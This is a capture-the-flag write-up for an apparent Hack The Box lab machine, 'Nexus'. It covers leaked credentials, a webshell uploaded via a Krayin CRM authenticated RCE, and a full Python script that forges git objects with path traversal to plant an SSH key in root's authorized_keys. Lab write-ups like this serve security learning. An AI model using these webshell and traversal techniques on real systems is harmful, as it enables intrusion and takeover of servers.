================================================================================
                    HTB NEXUS - COMPLETE WRITE-UP
================================================================================

TARGET IP     : 10.129.107.253
ATTACKER IP   : 10.10.16.13
DATE          : 2026-07-02

================================================================================
1. INITIAL ACCESS - KRAYIN CRM RCE
================================================================================

Discovered Gitea instance at git.nexus.htb with .env file exposing:
- Database: krayin / N27xh!!2ucY04
- IMAP: username1 / password1
- Admin email: admin@nexus.htb

Found hiring manager email on main domain nexus.htb:
j.matthew@nexus.htb

Logged into Krayin CRM at billing.nexus.htb:
Email: j.matthew@nexus.htb
Password: N27xh!!2ucY04

Exploited CVE-2026-38526 (Authenticated RCE via TinyMCE upload):
Uploaded webshell through Email Compose → Add Attachment

Webshell URL:
http://billing.nexus.htb/storage/emails/6/webshell.php?cmd=id

Output:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Reverse shell obtained to Kali listener (port 4444).

================================================================================
2. USER FLAG
================================================================================

Found user flag:
cat /home/jones/user.txt

USER FLAG: fba6fd78578e87e3af05714057632690

================================================================================
3. PRIVILEGE ESCALATION - GITEA TEMPLATE SYNC
================================================================================

Identified Gitea running on port 3000:
ps aux | grep gitea
# /usr/local/bin/gitea web --config /etc/gitea/app.ini

Discovered template sync service:
systemctl list-timers | grep template
# gitea-template-sync.timer

Sync script: /etc/gitea/template-sync.py
Log: /var/log/template-sync.log

Gitea credentials (reused from database):
User: jones
Password: y27xb3ha!!74GbR

SSH to Nexus as jones:
ssh jones@10.129.107.253
Password: y27xb3ha!!74GbR

--------------------------------------------------------------------------------
3.1 GENERATE SSH KEY
--------------------------------------------------------------------------------

ssh-keygen -t ed25519 -f /tmp/.k -N ''
cat /tmp/.k.pub
# ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFE3S4q3YFOw5g8gG2HbPfSHjyU670Tm9JBwEi8o5FY2 jones@nexus

--------------------------------------------------------------------------------
3.2 CREATE TEMPLATE REPOSITORY
--------------------------------------------------------------------------------

curl -X POST http://127.0.0.1:3000/api/v1/user/repos \
  -u 'jones:y27xb3ha!!74GbR' \
  -H "Content-Type: application/json" \
  -d '{"name":"rce","private":false,"auto_init":true,"template":true}'

--------------------------------------------------------------------------------
3.3 BUILD TRAVERSAL PAYLOAD
--------------------------------------------------------------------------------

cd /tmp
git clone http://jones:'y27xb3ha!!74GbR'@127.0.0.1:3000/jones/rce.git
cd rce

cat > /tmp/build.py << 'EOF'
#!/usr/bin/env python3
import hashlib,zlib,os,subprocess,sys,time

def write_obj(data,t):
    h=("%s %d"%(t,len(data))).encode()+b"\x00"
    s=h+data
    sha=hashlib.sha1(s).hexdigest()
    d=os.path.join(".git","objects",sha[:2])
    os.makedirs(d,exist_ok=True)
    p=os.path.join(d,sha[2:])
    if not os.path.exists(p):
        open(p,"wb").write(zlib.compress(s))
    return sha

def entry(mode,name,sha):
    return("%s %s"%(mode,name)).encode()+b"\x00"+bytes.fromhex(sha)

if not os.path.isdir(".git"):
    print("Run inside git repo");sys.exit(1)

r=subprocess.run(["cat","/tmp/.k.pub"],capture_output=True,text=True)
if r.returncode!=0:
    print("ssh-keygen -t ed25519 -f /tmp/.k -N ''");sys.exit(1)

key=r.stdout.strip()+"\n"
blob=write_obj(key.encode(),"blob")
readme=write_obj(b"# Template\n","blob")
ssh_t=write_obj(entry("100644","authorized_keys",blob),"tree")
cur=write_obj(entry("40000",".ssh",ssh_t),"tree")

# 5 levels of .. to reach /root
fir=write_obj(entry("40000","root",cur),"tree")
for i in range(4):
    fir=write_obj(entry("40000","..",fir),"tree")

root=write_obj(entry("100644","README.md",readme)+entry("40000","..",fir),"tree")

ts=int(time.time())
c="tree %s\nauthor x <x@x> %d +0000\ncommitter x <x@x> %d +0000\n\ninit\n"%(root,ts,ts)
sha=write_obj(c.encode(),"commit")

os.makedirs(os.path.join(".git","refs","heads"),exist_ok=True)
open(os.path.join(".git","refs","heads","main"),"w").write(sha+"\n")

print("Done: "+sha)
EOF

chmod +x /tmp/build.py
python3 /tmp/build.py
# Done: bce1ed7e8feb60e7a566e59869aeaf150a05fb7b

git push -u origin main --force

--------------------------------------------------------------------------------
3.4 WAIT FOR SYNC & SSH AS ROOT
--------------------------------------------------------------------------------

Template sync ran successfully:
[2026-07-02 11:26:59] Syncing template: jones/rce
[2026-07-02 11:26:59]   synced: ../../../../../root/.ssh/authorized_keys
[2026-07-02 11:26:59] Template sync complete

SSH as root:
ssh -i /tmp/.k root@127.0.0.1

Successfully logged in as root.

================================================================================
4. ROOT FLAG
================================================================================

root@nexus:~# ls
root.txt
root@nexus:~# cat root.txt
b292ff0c494cc6ea45badeb20774e850

ROOT FLAG: b292ff0c494cc6ea45badeb20774e850

================================================================================
5. FLAG SUMMARY
================================================================================

USER FLAG: fba6fd78578e87e3af05714057632690
ROOT FLAG: b292ff0c494cc6ea45badeb20774e850

================================================================================
6. CREDENTIALS SUMMARY
================================================================================

Krayin CRM:
- Email: j.matthew@nexus.htb
- Password: N27xh!!2ucY04

Database:
- User: krayin
- Password: N27xh!!2ucY04

Gitea / SSH (jones):












- User: jones
- Password: y27xb3ha!!74GbR

Root SSH:
- Key: /tmp/.k
- Fingerprint: SHA256:4nIzSw4N0KASmiuFWpLf2yVcy0MRSWKXiRzpTFKNulA

================================================================================
7. KEY COMMANDS
================================================================================

# Webshell execution
curl http://billing.nexus.htb/storage/emails/6/webshell.php?cmd=id

# User flag
cat /home/jones/user.txt

# Root flag
cat /root/root.txt

# SSH as root
ssh -i /tmp/.k root@127.0.0.1

================================================================================
8. VULNERABILITIES USED
================================================================================

1. CVE-2026-38526 - Krayin CRM Authenticated RCE via TinyMCE upload
2. Gitea Template Sync Directory Traversal - Unauthenticated file write via git objects

================================================================================
9. TIMELINE
================================================================================

1. Enumerated subdomains: billing.nexus.htb, git.nexus.htb
2. Found .env file with credentials in git repository
3. Found hiring manager email j.matthew@nexus.htb on main domain
4. Logged into Krayin CRM as j.matthew
5. Uploaded webshell via CVE-2026-38526
6. Found user flag in /home/jones/user.txt
7. Identified Gitea service and template sync vulnerability
8. Created template repository with directory traversal payload
9. Waited for template sync to write SSH key
10. SSH as root and retrieved root flag

================================================================================
10. PORTS & SERVICES
================================================================================

22/tcp   - SSH
80/tcp   - HTTP (billing.nexus.htb - Krayin CRM)
3000/tcp - Gitea (internal)
3306/tcp - MySQL (internal)
8080/tcp - phpMyAdmin (internal)
1025/tcp - Mailhog (internal)
993/tcp  - IMAP (internal)

================================================================================
                            END OF WRITE-UP
================================================================================
